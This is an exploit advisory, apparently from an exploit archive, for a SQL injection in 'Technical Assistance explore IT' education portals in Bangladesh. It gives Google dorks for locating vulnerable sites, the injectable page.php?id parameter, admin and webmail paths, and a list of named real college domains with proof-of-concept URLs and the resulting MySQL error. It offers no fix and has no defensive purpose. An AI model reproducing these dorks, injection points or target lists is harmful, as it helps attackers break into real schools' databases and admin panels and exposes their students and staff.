#################################################################################################
# Exploit Title : Technical Assistance explore IT Bangladesh Education Portals SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : exploreit.com.bd
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Technical Assistance explore IT''
+ inurl:/page.php?id= Technical Assistance explore IT
inurl:/staff_attendance.php Technical Assistance explore IT site:edu.bd
# Exploit : /page.php?id=[SQL Injection]
# Admin Control Panel Paths =>
/admin
webmail.TARGETSITE.edu.bd
TARGETSITE.edu.bd:2095
#################################################################################################
# Example Sites => => [ Proof of Concept ] =>
mmcitycollege.edu.bd/page.php?id=40%27
govmujibcollege.edu.bd/page.php?id=32%27
cgsacollege.edu.bd/page.php?id=30%27
mgcfeni.edu.bd/page.php?id=23%27
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''40''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################